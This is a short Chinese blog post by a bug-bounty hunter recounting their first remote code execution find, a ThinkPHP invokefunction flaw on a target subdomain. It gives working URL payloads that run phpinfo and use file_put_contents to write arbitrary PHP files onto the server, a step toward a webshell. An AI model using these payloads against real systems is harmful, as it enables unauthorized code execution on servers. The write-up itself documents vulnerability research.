闲来无事,找了个平台挖挖SRC,且记录一下人生第一个远程代码执行漏洞,虽说没有奖励(已存在,手动哭泣表情包),但是还是记录一下。 1.信息收集,全面开展,IP、端口、CMS、子域名.......嗯? 子域名漏扫发现了远程代码执行。漏扫原图: 2.小手激动的抖动,第一次挖到这么高级的漏洞。赶快去百度,利用一手: 3.GITHUB给出的POC:?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 验证结果: 4.再根据百度出来的姿势,来一发: 5.卡在这里不会了,想要咨询大佬,结果大佬直接发来一图: 6.老老实实又百度一波: 7.学到了新姿势,马上又激动的去验证一手,查看了被禁用了的命令函数: 发现file_put_contents还可以利用,但是怎么利用,这个又不会了。---此处感谢:某某种马,使用file_put_contents成功写入, POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test1.php&vars[1][]=<?php echo 'ok';?> 8.写入phpinfo验证,?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test3.php&vars[1][]=<?php%20phpinfo();?>: 接下就不用说了,感谢支持的大佬教学。